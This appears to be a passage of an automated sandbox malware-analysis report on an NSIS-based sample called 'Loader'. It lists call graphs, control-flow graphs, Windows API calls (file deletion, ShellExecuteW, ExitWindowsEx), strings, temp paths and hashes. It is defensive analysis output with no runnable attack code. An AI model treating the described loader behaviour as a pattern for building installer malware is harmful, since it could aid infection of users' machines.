406d2f lstrcatW 3516->3519 3540 406e84 3517->3540 3517->3552 3575 406301 FindFirstFileW 3517->3575 3581 40677d lstrlenW 3518->3581 3520 406d3f 3519->3520 3524 406d4f lstrcatW 3520->3524 3526 406d57 lstrlenW FindFirstFileW 3520->3526 3524->3526 3525 4062cf 11 API calls 3525->3552 3526->3517 3553 406d7e 3526->3553 3529 405d32 CharNextW 3529->3553 3530 4062cf 11 API calls 3531 406ea5 3530->3531 3532 405e5c 2 API calls 3531->3532 3533 406ead RemoveDirectoryW 3532->3533 3537 406ef0 3533->3537 3538 406eb9 3533->3538 3534 406e44 FindNextFileW 3536 406e5c FindClose 3534->3536 3534->3553 3536->3517 3539 404f9e 25 API calls 3537->3539 3538->3540 3541 406ebf 3538->3541 3539->3552 3540->3525 3543 4062cf 11 API calls 3541->3543 3542 4062cf 11 API calls 3542->3553 3544 406ec9 3543->3544 3547 404f9e 25 API calls 3544->3547 3545 406cc7 72 API calls 3545->3553 3549 406ed3 3547->3549 3550 406c94 42 API calls 3549->3550 3550->3552 3551 404f9e 25 API calls 3551->3534 3552->3509 3553->3529 3553->3534 3553->3542 3553->3545 3553->3551 3554 404f9e 25 API calls 3553->3554 3571 406035 lstrcpynW 3553->3571 3572 405e5c GetFileAttributesW 3553->3572 3585 406c94 3553->3585 3554->3553 3590 406035 lstrcpynW 3556->3590 3558 4067bb 3591 405d85 CharNextW CharNextW 3558->3591 3561 406064 5 API calls 3564 4067d1 3561->3564 3562 406809 lstrlenW 3563 406810 3562->3563 3562->3564 3566 40674e 3 API calls 3563->3566 3564->3562 3565 406301 2 API calls 3564->3565 3568 4067c7 3564->3568 3569 40677d 2 API calls 3564->3569 3565->3564 3567 406816 GetFileAttributesW 3566->3567 3567->3568 3568->3513 3568->3514 3569->3562 3570->3516 3571->3553 3573 405e79 DeleteFileW 3572->3573 3574 405e6b SetFileAttributesW 3572->3574 3573->3553 3574->3573 3576 406322 3575->3576 3577 406317 FindClose 3575->3577 3576->3552 3578 40674e lstrlenW CharPrevW 3576->3578 3577->3576 3579 406777 3578->3579 3580 40676b lstrcatW 3578->3580 3579->3530 3580->3579 3582 40678c 3581->3582 3583 406792 CharPrevW 3582->3583 3584 40679e 3582->3584 3583->3582 3583->3584 3584->3520 3597 406328 GetModuleHandleA 3585->3597 3589 406cbc 3589->3553 3590->3558 3592 405da2 3591->3592 3593 405db4 3591->3593 3592->3593 3595 405daf CharNextW 3592->3595 3594 405dd8 3593->3594 3596 405d32 CharNextW 3593->3596 3594->3561 3594->3568 3595->3594 3596->3593 3598 406340 LoadLibraryA 3597->3598 3599 40634b GetProcAddress 3597->3599 3598->3599 3600 406359 3598->3600 3599->3600 3600->3589 3601 406ac5 lstrcpyW 3600->3601 3602 406b13 GetShortPathNameW 3601->3602 3603 406aea 3601->3603 3604 406b2c 3602->3604 3605 406c8e 3602->3605 3627 405e7c GetFileAttributesW CreateFileW 3603->3627 3604->3605 3608 406b34 WideCharToMultiByte 3604->3608 3605->3589 3607 406af3 CloseHandle GetShortPathNameW 3607->3605 3609 406b0b 3607->3609 3608->3605 3610 406b51 WideCharToMultiByte 3608->3610 3609->3602 3609->3605 3610->3605 3611 406b69 wsprintfA 3610->3611 3612 406831 18 API calls 3611->3612 3613 406b95 3612->3613 3628 405e7c GetFileAttributesW CreateFileW 3613->3628 3615 406ba2 3615->3605 3616 406baf GetFileSize GlobalAlloc 3615->3616 3617 406bd0 ReadFile 3616->3617 3618 406c84 CloseHandle 3616->3618 3617->3618 3619 406bea 3617->3619 3618->3605 3619->3618 3629 405de2 lstrlenA 3619->3629 3622 406c03 lstrcpyA 3625 406c25 3622->3625 3623 406c17 3624 405de2 4 API calls 3623->3624 3624->3625 3626 406c5c SetFilePointer WriteFile GlobalFree 3625->3626 3626->3618 3627->3607 3628->3615 3630 405e23 lstrlenA 3629->3630 3631 405e2b 3630->3631 3632 405dfc lstrcmpiA 3630->3632 3631->3622 3631->3623 3632->3631 3633 405e1a CharNextA 3632->3633 3633->3630 4944 4021b5 4945 40145c 18 API calls 4944->4945 4946 4021bb 4945->4946 4947 40145c 18 API calls 4946->4947 4948 4021c4 4947->4948 4949 40145c 18 API calls 4948->4949 4950 4021cd 4949->4950 4951 40145c 18 API calls 4950->4951 4952 4021d6 4951->4952 4953 404f9e 25 API calls 4952->4953 4954 4021e2 ShellExecuteW 4953->4954 4955 40221b 4954->4955 4956 40220d 4954->4956 4957 4062cf 11 API calls 4955->4957 4958 4062cf 11 API calls 4956->4958 4959 402230 4957->4959 4958->4955 4960 402238 4961 40145c 18 API calls 4960->4961 4962 40223e 4961->4962 4963 4062cf 11 API calls 4962->4963 4964 40224b 4963->4964 4965 404f9e 25 API calls 4964->4965 4966 402255 4965->4966 4967 405c6b 2 API calls 4966->4967 4968 40225b 4967->4968 4969 4062cf 11 API calls 4968->4969 4977 4022ac CloseHandle 4968->4977 4974 40226d 4969->4974 4971 4030e3 4972 402283 WaitForSingleObject 4973 402291 GetExitCodeProcess 4972->4973 4972->4974 4976 4022a3 4973->4976 4973->4977 4974->4972 4975 40635e 2 API calls 4974->4975 4974->4977 4975->4972 4979 405f7d wsprintfW 4976->4979 4977->4971 4979->4977 3666 401eb9 3667 401f24 3666->3667 3670 401ec6 3666->3670 3668 401f53 GlobalAlloc 3667->3668 3672 401f28 3667->3672 3674 406831 18 API calls 3668->3674 3669 401ed5 3673 4062cf 11 API calls 3669->3673 3670->3669 3676 401ef7 3670->3676 3671 401f36 3690 406035 lstrcpynW 3671->3690 3672->3671 3675 4062cf 11 API calls 3672->3675 3685 401ee2 3673->3685 3678 401f46 3674->3678 3675->3671 3688 406035 lstrcpynW 3676->3688 3680 402708 3678->3680 3681 402387 GlobalFree 3678->3681 3681->3680 3682 401f06 3689 406035 lstrcpynW 3682->3689 3683 406831 18 API calls 3683->3685 3685->3680 3685->3683 3686 401f15 3691 406035 lstrcpynW 3686->3691 3688->3682 3689->3686 3690->3678 3691->3680 4980 404039 4981 404096 4980->4981 4982 404046 lstrcpynA lstrlenA 4980->4982 4982->4981 4983 404077 4982->4983 4983->4981 4984 404083 GlobalFree 4983->4984 4984->4981

                                                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                                                Function 004038AF Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 146 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 153 403947-40394a 146->153 154 40394f-403963 call 405d32 CharNextW 146->154 153->154 157 4039f6-4039fc 154->157 158 403a02 157->158 159 403968-40396e 157->159 160 403a21-403a39 GetTempPathW call 4037f8 158->160 161 403970-403976 159->161 162 403978-40397c 159->162 172 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 160->172 173 403a5f-403a79 DeleteFileW call 4035b3 160->173 161->161 161->162 163 403984-403988 162->163 164 40397e-403983 162->164 166 4039e4-4039f1 call 405d32 163->166 167 40398a-403991 163->167 164->163 166->157 181 4039f3 166->181 170 403993-40399a 167->170 171 4039a6-4039b8 call 40382c 167->171 176 4039a1 170->176 177 40399c-40399f 170->177 186 4039ba-4039c1 171->186 187 4039cd-4039e2 call 40382c 171->187 172->173 184 403af8-403b07 call 403885 CoUninitialize 172->184 173->184 185 403a7b-403a81 173->185 176->171 177->171 177->176 181->157 201 403bfa-403c00 184->201 202 403b0d-403b1d call 405ccc ExitProcess 184->202 188 403ae1-403ae8 call 405958 185->188 189 403a83-403a8c call 405d32 185->189 191 4039c3-4039c6 186->191 192 4039c8 186->192 187->166 198 403a04-403a1c call 40824c call 406035 187->198 200 403aed-403af3 call 406113 188->200 204 403aa5-403aa7 189->204 191->187 191->192 192->187 198->160 200->184 206 403c02-403c1f call 406328 * 3 201->206 207 403c7d-403c85 201->207 211 403aa9-403ab3 204->211 212 403a8e-403aa0 call 40382c 204->212 237 403c21-403c23 206->237 238 403c69-403c74 ExitWindowsEx 206->238 213 403c87 207->213 214 403c8b 207->214 219 403b23-403b3d lstrcatW lstrcmpiW 211->219 220 403ab5-403ac5 call 4067aa 211->220 212->211 227 403aa2 212->227 213->214 219->184 221 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 219->221 220->184 230 403ac7-403add call 406035 * 2 220->230 225 403b62-403b82 call 406035 * 2 221->225 226 403b57-403b5d call 406035 221->226 247 403b87-403ba3 call 406831 DeleteFileW 225->247 226->225 227->204 230->188 237->238 241 403c25-403c27 237->241 238->207 244 403c76-403c78 call 40141d 238->244 241->238 245 403c29-403c3b GetCurrentProcess 241->245 244->207 245->238 252 403c3d-403c5f 245->252 253 403be4-403bec 247->253 254 403ba5-403bb5 CopyFileW 247->254 252->238 253->247 255 403bee-403bf5 call 406c94 253->255 254->253 256 403bb7-403bd7 call 406c94 call 406831 call 405c6b 254->256 255->184 256->253 266 403bd9-403be0 CloseHandle 256->266 266->253
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                                • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                                • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                                                • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                                                • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                                                • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                                                • String ID: /D=$ _?=$C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                                                • API String ID: 2435955865-2914906847
                                                                                                                                                                                                                                                                                                                • Opcode ID: ac3f82c8583c87bde93f90980a1070f9faa323d75b06bd3b84399b38fb4e9a16
                                                                                                                                                                                                                                                                                                                • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac3f82c8583c87bde93f90980a1070f9faa323d75b06bd3b84399b38fb4e9a16
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                                                                                                                                                Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 343 406cc7-406ce1 call 4067aa 346 406ce3-406cf5 DeleteFileW 343->346 347 406cfa-406d05 343->347 348 406ef9-406efb 346->348 349 406d07-406d09 347->349 350 406d19-406d2d call 406035 347->350 351 406e77-406e7c 349->351 352 406d0f-406d13 349->352 359 406d39-406d3a call 40677d 350->359 360 406d2f-406d37 lstrcatW 350->360 354 406ef7-406ef8 351->354 355 406e7e-406e82 351->355 352->350 352->351 354->348 357 406e84-406e89 355->357 358 406e8b-406e92 call 406301 355->358 361 406ee1-406eee call 4062cf 357->361 358->354 371 406e94-406eb7 call 40674e call 4062cf call 405e5c RemoveDirectoryW 358->371 362 406d3f-406d43 359->362 360->362 361->354 366 406d45-406d4d 362->366 367 406d4f-406d55 lstrcatW 362->367 366->367 369 406d57-406d78 lstrlenW FindFirstFileW 366->369 367->369 372 406e67 369->372 373 406d7e-406d93 call 405d32 369->373 393 406ef0-406ef2 call 404f9e 371->393 394 406eb9-406ebd 371->394 377 406e69-406e6c 372->377 382 406d95-406d99 373->382 383 406d9e-406da2 373->383 377->351 380 406e6e-406e73 377->380 380->351 382->383 385 406d9b 382->385 386 406dc0-406dd0 call 406035 383->386 387 406da4-406dab 383->387 385->383 400 406dd2-406dda 386->400 401 406de7-406e04 call 4062cf call 405e5c DeleteFileW 386->401 389 406db1-406db4 387->389 390 406e44-406e56 FindNextFileW 387->390 389->386 395 406db6-406dba 389->395 390->373 392 406e5c-406e65 FindClose 390->392 392->377 393->354 398 406edc 394->398 399 406ebf-406eda call 4062cf call 404f9e call 406c94 394->399 395->386 395->390 398->361 399->354 400->390 404 406ddc-406de5 call 406cc7 400->404 413 406e06-406e0a 401->413 414 406e3d-406e3f call 404f9e 401->414 404->390 417 406e29-406e3b call 4062cf 413->417 418 406e0c-406e27 call 4062cf call 404f9e call 406c94 413->418 414->390 417->390 418->390
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                                                • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                                                • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                                                • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                                                • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                                                • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                                                • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                                                • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                                                                • Opcode ID: 0773e1bb02d94fce99ad1c6111755f8979c63676e37ea285c86d1b4844ce1413
                                                                                                                                                                                                                                                                                                                • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0773e1bb02d94fce99ad1c6111755f8979c63676e37ea285c86d1b4844ce1413
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                                                                Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 513 406831-40683c 514 40683e-40684d 513->514 515 40684f-406863 513->515 514->515 516 406865-406872 515->516 517 40687b-406881 515->517 516->517 518 406874-406877 516->518 519 406887-406888 517->519 520 406aad-406ab6 517->520 518->517 523 406889-406896 519->523 521 406ac1-406ac2 520->521 522 406ab8-406abc call 406035 520->522 522->521 525 406aab-406aac 523->525 526 40689c-4068ac 523->526 525->520 527 4068b2-4068b5 526->527 528 406a86 526->528 529 406a89 527->529 530 4068bb-4068f9 527->530 528->529 531 406a99-406a9c 529->531 532 406a8b-406a97 529->532 533 406a19-406a22 530->533 534 4068ff-40690a GetVersion 530->534 537 406a9f-406aa5 531->537 532->537 535 406a24-406a27 533->535 536 406a5b-406a64 533->536 538 406928 534->538 539 40690c-406914 534->539 543 406a37-406a46 call 406035 535->543 544 406a29-406a35 call 405f7d 535->544 541 406a72-406a84 lstrlenW 536->541 542 406a66-406a6d call 406831 536->542 537->523 537->525 540 40692f-406936 538->540 539->538 545 406916-40691a 539->545 547 406938-40693a 540->547 548 40693b-40693d 540->548 541->537 542->541 552 406a4b-406a51 543->552 544->552 545->538 551 40691c-406920 545->551 547->548 553 406979-40697c 548->553 554 40693f-406965 call 405eff 548->554 551->538 556 406922-406926 551->556 552->541 557 406a53-406a59 call 406064 552->557 559 40698c-40698f 553->559 560 40697e-40698a GetSystemDirectoryW 553->560 567 406a05-406a09 554->567 568 40696b-406974 call 406831 554->568 556->540 557->541 564 406991-40699f GetWindowsDirectoryW 559->564 565 4069fb-4069fd 559->565 563 4069ff-406a03 560->563 563->557 563->567 564->565 565->563 569 4069a1-4069ab 565->569 567->557 571 406a0b-406a17 lstrcatW 567->571 568->563 572 4069c5-4069db SHGetSpecialFolderLocation 569->572 573 4069ad-4069b0 569->573 571->557 575 4069f6-4069f8 572->575 576 4069dd-4069f4 SHGetPathFromIDListW CoTaskMemFree 572->576 573->572 574 4069b2-4069b9 573->574 578 4069c1-4069c3 574->578 575->565 576->563 576->575 578->563 578->572
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042B20B,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,0042B20B,759223A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                                                • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                                                • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                                                                • Opcode ID: 0ff86b0255460a482875f57470011174a3d6202513b078473b149acfc4674c3c
                                                                                                                                                                                                                                                                                                                • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ff86b0255460a482875f57470011174a3d6202513b078473b149acfc4674c3c
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                                                                Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 870 406301-406315 FindFirstFileW 871 406322 870->871 872 406317-406320 FindClose 870->872 873 406324-406325 871->873 872->873
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
